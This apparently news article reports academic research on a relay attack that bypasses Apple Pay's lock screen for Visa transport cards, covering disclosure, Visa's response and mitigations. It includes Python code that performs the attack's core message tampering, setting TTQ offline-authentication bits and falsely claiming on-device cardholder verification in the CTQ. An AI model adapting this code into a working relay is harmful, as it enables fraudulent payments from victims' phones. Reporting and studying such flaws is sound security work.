Academic researchers have found a way for an adversary to make fraudulent payments from a target iPhone's Apple Pay. It exploits weaknesses in how a Visa card configured as the transport card in Apple Pay handles contactless EMV transactions. The attack works against a locked iPhone, for example one in someone's bag, provided the attacker's reader is within NFC range of it; because the EMV messages are relayed, the payment terminal being defrauded does not need to be anywhere near the phone.
A Sophisticated Attack To Steal Money Via Apple Pay
A team of academic researchers has shown how an adversary can steal money from the Visa cards of target iPhones by exploiting Apple Pay.
Specifically, the weakness lies in how a Visa card set up in Apple Pay for contactless EMV transactions is handled. EMV relay attacks have long been possible in principle; Samsung Pay, which offers a comparable feature, already applies a mitigation (described below).
Apple also requires biometric authentication (Face ID or Touch ID) before a normal Apple Pay payment is approved. These checks can nevertheless be bypassed because of weaknesses on Visa's side combined with how Apple Pay handles transport readers. Mastercard cards on Apple Pay are not affected.
How the attack works
The attack exploits Apple Pay's "Express Transit/Travel" feature, which lets the iPhone make contactless payments to EMV readers at transport ticket gates without being unlocked.
In simple terms, Apple Pay recognises "Magic Bytes" (a non-standard sequence of bytes) sent by Transport for London (TfL) ticket-gate readers and, on seeing them, skips the lock-screen check so the tap goes through quickly. As the researchers explain,
If a non-standard sequence of bytes (Magic Bytes) precedes the standard ISO 14443-A WakeUp command, Apple Pay will consider this a transaction with a transport EMV reader.
That is what the adversary exploits. This "MITM replay and relay" attack requires the target iPhone to have a Visa card configured as its transport card. The attacker places a device that emulates a transport reader within NFC range of the iPhone and a card emulator at a real, non-transport EMV terminal, then relays the EMV messages between the two while modifying them in transit.
This works because transport readers often have only intermittent connectivity, so the EMV flow allows Offline Data Authentication (ODA), in which the reader verifies card data locally instead of contacting the issuer for every tap; the attacker's modified reader flags steer the iPhone onto that path.
Describing the attack methodology, the researchers stated on the webpage,
The attack works by first replaying the Magic Bytes to the iPhone, such that it believes the transaction is happening with a transport EMV reader. Secondly, while relaying the EMV messages, the Terminal Transaction Qualifiers (TTQ), sent by the EMV terminal, need to be modified such that the bits (flags) for Offline Data Authentication (ODA) for Online Authorizations supported and EMV mode supported are set…
To relay transactions over the contactless limit, the Card Transaction Qualifiers (CTQ), sent by the iPhone, need to be modified such that the bit (flag) for Consumer Device Cardholder Verification Method is set. This tricks the EMV reader into believing that on-device user authentication has been performed (e.g. by fingerprint).
The researchers have demonstrated the attack in a video.
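The two message rewrites in the quoted methodology can be shown on real EMV data structures. The following is an added example written for this article, not code from the researchers, Apple or Visa: it simulates the man-in-the-middle's transformation of the GET PROCESSING OPTIONS (GPO) command, where the reader's Terminal Transaction Qualifiers (TTQ, tag 9F66) travel as part of the PDOL data, and of the GPO response, where the phone returns its Card Transaction Qualifiers (CTQ, tag 9F6C). Tag numbers and bit positions are taken from the Visa contactless kernel specification (EMV Contactless Book C-3); the sample PDOL, command and response are constructed, nothing is sent over NFC, and the Magic Bytes themselves, which the page does not give, are not modelled. All function and constant names are this example's own.

```python
"""Offline simulation of the relay's two message rewrites: TTQ in the GET
PROCESSING OPTIONS command (reader -> phone) and CTQ in its response
(phone -> reader). Added example; all sample APDUs are constructed."""
from typing import Tuple

TAG_TTQ = bytes.fromhex("9F66")  # Terminal Transaction Qualifiers, 4 bytes
TAG_CTQ = bytes.fromhex("9F6C")  # Card Transaction Qualifiers, 2 bytes
# Bit meanings follow EMV Contactless Book C-3 (Visa kernel); bit 8 is the MSB.
TTQ_B1_EMV_MODE_SUPPORTED = 0x20   # TTQ byte 1, bit 6
TTQ_B1_ODA_FOR_ONLINE_AUTH = 0x01  # TTQ byte 1, bit 1
CTQ_B2_CDCVM_PERFORMED = 0x80      # CTQ byte 2, bit 8


def _read_tag(data: bytes, i: int) -> Tuple[bytes, int]:
    """Return (tag, index after tag) for a 1- or 2-byte BER-TLV tag."""
    start = i
    first = data[i]
    i += 1
    if first & 0x1F == 0x1F:          # more tag bytes follow
        while data[i] & 0x80:
            i += 1
        i += 1
    return data[start:i], i


def pdol_offset(pdol: bytes, want: bytes) -> Tuple[int, int]:
    """The PDOL (tag 9F38 from the SELECT response) lists tag||length pairs
    without values; the reader's GPO data is those values concatenated in the
    same order. Return (offset, length) of `want` inside that data."""
    i = off = 0
    while i < len(pdol):
        tag, i = _read_tag(pdol, i)
        length = pdol[i]
        i += 1
        if tag == want:
            return off, length
        off += length
    raise KeyError(want.hex())


def find_tag(data: bytes, want: bytes, base: int = 0) -> Tuple[int, int]:
    """Return (absolute offset, length) of primitive tag `want`, descending
    into constructed templates such as 77. Short-form lengths only."""
    i = 0
    while i < len(data):
        first = data[i]
        tag, i = _read_tag(data, i)
        length = data[i]
        i += 1
        if tag == want:
            return base + i, length
        if first & 0x20:               # constructed: search inside it
            try:
                return find_tag(data[i:i + length], want, base + i)
            except KeyError:
                pass
        i += length
    raise KeyError(want.hex())


def rewrite_gpo_command(apdu: bytes, pdol: bytes) -> bytes:
    """Reader -> phone: set 'EMV mode supported' and 'ODA for Online
    Authorizations supported' in TTQ byte 1, the transport-reader profile."""
    if apdu[:4] != bytes.fromhex("80A80000") or apdu[5] != 0x83:
        raise ValueError("not a GET PROCESSING OPTIONS command")
    data_start = 7                     # CLA INS P1 P2 Lc 83 len
    off, length = pdol_offset(pdol, TAG_TTQ)
    if length != 4:
        raise ValueError("TTQ must be 4 bytes")
    buf = bytearray(apdu)
    buf[data_start + off] |= TTQ_B1_EMV_MODE_SUPPORTED | TTQ_B1_ODA_FOR_ONLINE_AUTH
    return bytes(buf)


def rewrite_gpo_response(rapdu: bytes) -> bytes:
    """Phone -> reader: set 'Consumer Device CVM performed' in CTQ byte 2 so
    the reader believes on-device authentication took place."""
    off, length = find_tag(rapdu[:-2], TAG_CTQ)   # drop SW1 SW2 before parsing
    if length != 2:
        raise ValueError("CTQ must be 2 bytes")
    buf = bytearray(rapdu)
    buf[off + 1] |= CTQ_B2_CDCVM_PERFORMED
    return bytes(buf)


# Constructed sample exchange (not a captured transaction).
SAMPLE_PDOL = bytes.fromhex("9F66049F02069F03069F1A0295055F2A029A039C019F3704")
SAMPLE_GPO_CMD = bytes.fromhex(
    "80A80000" "23" "8321"
    "96004000"        # TTQ: MSD, contact chip, online PIN, signature; no EMV mode, no ODA
    "000000001000"    # 9F02 amount 10.00
    "000000000000"    # 9F03 other amount
    "0826" "0000000000" "0826"   # 9F1A country, 95 TVR, 5F2A currency
    "210930" "00" "12345678"     # 9A date, 9C type, 9F37 unpredictable number
    "00"
)
SAMPLE_GPO_RSP = bytes.fromhex("770E" "82020020" "9F6C023000" "9F36020001" "9000")


def relay_exchange(cmd=SAMPLE_GPO_CMD, rsp=SAMPLE_GPO_RSP, pdol=SAMPLE_PDOL):
    """Return (command forwarded to the phone, response forwarded to the reader)."""
    return rewrite_gpo_command(cmd, pdol), rewrite_gpo_response(rsp)
```

Running `relay_exchange()` turns the sample TTQ `96004000` into `B7004000` (EMV mode and ODA-for-online bits set) and the sample CTQ `3000` into `3080` (consumer-device CVM claimed), while every other byte, including the amount, is forwarded untouched. The TTQ rewrite needs the PDOL from the SELECT response because the GPO data carries no tags, which is why a relay must track the whole exchange rather than patch a single message.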
Suggested Mitigations
Samsung Pay offers a similar locked-phone transit feature for contactless EMV transactions. It does not use Magic Bytes, so a locked Samsung phone always allows such transactions; instead, the transit taps are "zero value" payments, and the transport provider (TfL) charges the fare afterwards using the data associated with that zero-value transaction. This is why the researchers count it as a mitigation: a relayed zero-value transaction is of no use to a thief.
As for the Apple Pay issue, the researchers responsibly disclosed their findings to both Apple and Visa. Neither has yet fixed it, so the vulnerability remains.
The researchers therefore advise users, as a workaround, not to set a Visa card as the transport card in Apple Pay.
Visa, however, denies any real-world risk to users; it gave the following statement to BleepingComputer:
"Visa cards connected to Apple Pay Express Transit are secure and cardholders should continue to use them with confidence. Variations of contactless fraud schemes have been studied in laboratory settings for more than a decade and have proven to be impractical to execute at scale in the real world. Visa takes all security threats very seriously, and we work tirelessly to strengthen payment security across the ecosystem."
The team has published a research paper on these findings, which they will present at the IEEE Symposium on Security and Privacy 2022.